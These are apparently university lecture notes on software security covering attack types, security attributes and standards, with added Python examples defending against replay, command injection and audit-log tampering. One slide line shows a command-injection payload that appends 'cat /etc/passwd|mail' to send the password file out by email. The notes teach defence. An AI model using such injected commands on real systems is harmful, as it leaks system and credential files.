ISEC0511 Programming for Information System Security, Lecture Notes #2: Security in Software Systems


Vulnerability and Attacks

A vulnerability is a weak point in a system. There are several ways in which vulnerabilities can be discovered.

Exploiting Vulnerability

Once a security vulnerability is known, how to exploit it is also known.

What is not easily known is who has the device with the vulnerability and how to reach it.

Scanning systems in the network is a way to discover targets.


Passive Attacks

When a hacker eavesdrops on your system or monitors the transmitted packets, it is a passive attack.

Sensitive information such as credit card information can be discovered using this technique.

This is also called a sniffing attack.


Active Attacks

The original object is disturbed or manipulated.

The hacker can impersonate you and log into the remote system as you.

Hacking

The process of exploiting vulnerabilities and launching an attack on computers is called hacking.

Hackers hack computers, networks, and telephone systems for profit, sometimes even for fun.


Social Engineering

Social engineering is a technique used by adversaries to manipulate the social and psychological behavior of people to gain access to information or do something that they will not do in a different social setup.

Identity Theft

Carried out in order to obtain a financial identity, personal identity, medical records, or a business or commercial identity.

Phishing

E-mail scam.


Various Security Attacks

Brute-Force Attacks

Try to find the right combination of password or encryption key.

The attack is also used by researchers to test the strength of an encryption algorithm.

Key strength grows exponentially with key size.


Authentication Attacks

In a telecom network, a device is authenticated.

In a data network, a user is authenticated.

Dictionary Attack

Passwords should never be based on known information.

The attack is also used to discover emails.


Replay Attack

Ali Baba did not know the meaning of this phrase; he heard the bandits use it.

In a replay attack, the adversary replays a genuine message captured earlier to perform a function intended for a legitimate user.

Password Guessing

Knowing a user ID is relatively easy.

It is likely that we have a common user ID and password for many accounts (banks, ATM, emails, credit cards).

Password Sniffing
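
An added example, not from the lecture notes: one common defense against the replay attack described above is to bind each message to a nonce and a timestamp under a MAC, and to have the receiver refuse anything already seen or too old. The key, the message text and the 30-second window are constructed values.

```python
import hashlib
import hmac

KEY = b"constructed-demo-key"  # sample shared secret, constructed for this example
MAX_SKEW = 30                  # assumed policy: seconds a message stays acceptable

def sign(body: bytes, nonce: str, ts: int, key: bytes = KEY) -> str:
    """MAC over nonce, timestamp and body so none can be changed on its own."""
    # The nonce is assumed to be a hex string, so "|" cannot occur inside it.
    msg = b"|".join([nonce.encode(), str(ts).encode(), body])
    return hmac.new(key, msg, hashlib.sha256).hexdigest()

class Receiver:
    def __init__(self, key: bytes = KEY):
        self.key = key
        self.seen = {}  # nonce -> timestamp, for messages still inside the window

    def accept(self, body: bytes, nonce: str, ts: int, tag: str, now: int) -> str:
        if not hmac.compare_digest(tag, sign(body, nonce, ts, self.key)):
            return "rejected: bad MAC"
        if abs(now - ts) > MAX_SKEW:
            return "rejected: stale timestamp"
        if nonce in self.seen:
            return "rejected: replayed nonce"
        # Drop nonces the timestamp check would already refuse, bounding memory.
        self.seen = {n: t for n, t in self.seen.items() if abs(now - t) <= MAX_SKEW}
        self.seen[nonce] = ts
        return "accepted"

def demo() -> list:
    rx = Receiver()
    body, nonce, ts = b"transfer 100 to account 42", "a1b2c3d4", 1_700_000_000
    tag = sign(body, nonce, ts)
    forged = b"transfer 900 to account 42"
    return [
        rx.accept(body, nonce, ts, tag, now=ts + 1),         # genuine message
        rx.accept(body, nonce, ts, tag, now=ts + 2),         # captured copy, resent
        rx.accept(body, nonce, ts, tag, now=ts + 600),       # resent after the window
        rx.accept(forged, "e5f6a7b8", ts, tag, now=ts + 3),  # altered body, old tag
    ]

if __name__ == "__main__":
    for outcome in demo():
        print(outcome)
```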


Spoofing Attack: Spoofed IP, Spoofed emails, Spoofed SMS

Denial-of-Service Attacks: Distributed Denial-of-Service Attack, Half-Open Attack or SYN-Flooding, Denial of Service through User-ID Lock Attack, Ping of Death Attack, Smurf Attack


Packet Sniffer: Tcpdump and Ethereal (Wireshark)


Taking Control of Application

To take control of an application, you need to make the user execute your code.

Overflow Attack

Stack Smashing Attack

Remote Procedure Call Attack

Code Injection Attacks

echo Welcome $1 $2 $3 $4 hi;cat /etc/passwd|mail [email protected]

Luring Attack
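
An added example, not from the lecture notes, that reads the slide's line as a script echoing its arguments, followed by an argument that carries ";" and a second command (that reading is an assumption). It contrasts building a shell command line from input with passing the input as a single argument; a harmless "echo INJECTED" is the constructed second command, and the function names and allow-list pattern are hypothetical.

```python
import re
import subprocess

# Constructed input modelled on the slide: a greeting word, then a shell
# metacharacter and a second command (a harmless echo stands in here).
HOSTILE = "hi;echo INJECTED"

def greet_vulnerable(name: str) -> str:
    """Builds one shell command line from raw input (the flawed pattern)."""
    # With shell=True, /bin/sh parses ';' inside `name` as a command separator.
    result = subprocess.run("echo Welcome " + name, shell=True,
                            capture_output=True, text=True, check=True)
    return result.stdout

def greet_safe(name: str) -> str:
    """Passes the input as one argv element, so no shell ever parses it."""
    result = subprocess.run(["echo", "Welcome", name],
                            capture_output=True, text=True, check=True)
    return result.stdout

# Allow-list for a display name: letters first, then letters and a few marks.
NAME_RE = re.compile(r"[A-Za-z][A-Za-z .'-]{0,63}")

def validate_name(name: str) -> str:
    """Second layer: refuse input that is not a plausible name at all."""
    if not NAME_RE.fullmatch(name):
        raise ValueError("name contains characters outside the allow-list")
    return name

if __name__ == "__main__":
    print(repr(greet_vulnerable(HOSTILE)))  # two commands ran
    print(repr(greet_safe(HOSTILE)))        # input echoed back as plain text
    try:
        validate_name(HOSTILE)
    except ValueError as err:
        print("rejected:", err)
```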


Computer Security

Physical Security

Operating System Security: Shell Security, File System Security, Kernel Security

Network Security


Typical Security in Data Network


Counter External Threats

Stopping Attacker: the application should use all possible defenses to protect itself and all its data.

Firewall

Intrusion Detection System

Intrusion Prevention System

Honeypot

Penetration Test and Ethical Hacking


Security Programming

A programmer has a responsibility to ensure that the code written is secure and safe with minimum or no known vulnerability.

Security bugs have a very high impact.


Security Attributes

Confidentiality

A mechanism through which we keep the meaning of information or data secret.

This property is also known as privacy or encryption.

Integrity

A property through which you can detect whether your message or data have been corrupted or tampered with.


Availability

It is necessary that the service is available for the period it is advertised.

Any attack on availability is called a DoS attack.


Authentication

Authentication is a process by which we validate the identity of the parties.

In nonrepudiation we establish the identity of these parties beyond any doubt.

Digital signatures can achieve nonrepudiation.

One-factor authentication, Two-factor authentication, Multi-factor authentication.


Authorization

Usage constraints on objects based on security level or privilege of the subject.

This attribute is also called fine-grained access control or role-based security.


Accounting

Accounting is the process by which the usage of a service is metered.

Audit trails and logs for transactions in an application can also be considered as part of the accounting information.

These files need security so that adversaries cannot tamper with or delete them.

Anonymity

A property through which the user is anonymous to the external world.
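
An added example, not from the lecture notes: one way to make the audit trail described under Accounting tamper-evident is to chain each record to the previous one with an HMAC and keep the latest tag where the logging host cannot rewrite it. The key, field names and sample entries are constructed; the scheme detects editing and deletion but does not prevent them.

```python
import hashlib
import hmac
import json

KEY = b"constructed-audit-key"  # sample key; assumed to be kept off the logging host
GENESIS = "0" * 64              # fixed tag that precedes the first record

def _tag(prev_tag: str, entry: dict, key: bytes) -> str:
    """HMAC over the previous record's tag plus this entry, chaining the records."""
    payload = prev_tag.encode() + json.dumps(entry, sort_keys=True).encode()
    return hmac.new(key, payload, hashlib.sha256).hexdigest()

def append(log: list, entry: dict, key: bytes = KEY) -> str:
    """Append an entry and return its tag, to be stored elsewhere as the anchor."""
    prev = log[-1]["tag"] if log else GENESIS
    log.append({"entry": entry, "tag": _tag(prev, entry, key)})
    return log[-1]["tag"]

def verify(log: list, anchor: str, key: bytes = KEY):
    """Return None if intact, else the index where the chain first breaks.

    An index equal to len(log) means records are missing from the end.
    """
    prev = GENESIS
    for i, rec in enumerate(log):
        if not hmac.compare_digest(rec["tag"], _tag(prev, rec["entry"], key)):
            return i
        prev = rec["tag"]
    return None if hmac.compare_digest(prev, anchor) else len(log)

def demo() -> dict:
    # Constructed sample transactions.
    entries = [{"user": "alice", "action": "login"},
               {"user": "alice", "action": "transfer", "amount": 100},
               {"user": "bob", "action": "logout"}]
    log, anchor = [], GENESIS
    for e in entries:
        anchor = append(log, e)
    edited = json.loads(json.dumps(log))  # deep copy, then alter one amount
    edited[1]["entry"]["amount"] = 1
    return {"intact": verify(log, anchor),
            "edited": verify(edited, anchor),
            "middle_deleted": verify(log[:1] + log[2:], anchor),
            "tail_deleted": verify(log[:2], anchor)}
```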


Secured Programming

In secured programming you use the security attributes to ensure that the input data are secure.

Also, you use these attributes to ensure that the processed information is secured.

You make the data and information secure using security algorithms, security protocols, and secured programming.


Safe Programming

You as a programmer need to ensure that whatever program you write does not have any security vulnerability.

The bottom line is that the programs you write need to be robust and failsafe.


Vulnerability Remediation

To minimize the security risks posed by software vulnerabilities, a two-step approach is necessary.

First, minimize the number of vulnerabilities in the software that is being developed, and

Second, minimize the number of vulnerabilities in the software that have already been deployed.


Reducing the number of new vulnerabilities in the new software is the focus of secured and safe programming, while removing existing vulnerabilities is the focus of vulnerability remediation.


Database Security

Database Authentication

Database Privileges

Secure Metadata

Customize Access to Information: Views and Stored Procedures

High Availability Database

Database Encryption


Security Standards

Public-Key Cryptographic Standards: standards accepted as de facto standards for public key cryptography, helping interoperability between applications using cryptography for security.

CERT: Computer Emergency Response Team – www.cert.org

OWASP: Open Web Application Security Project – www.owasp.org


NIST: National Institute of Standards and Technology – csrc.nist.gov

OASIS: Organization for the Advancement of Structured Information Standards

SSE-CMM: System Security Engineering Capability Maturity Model – www.sse-cmm.org

ISO17799


Readings

Architecting Secure Software Systems, Chapter 1.
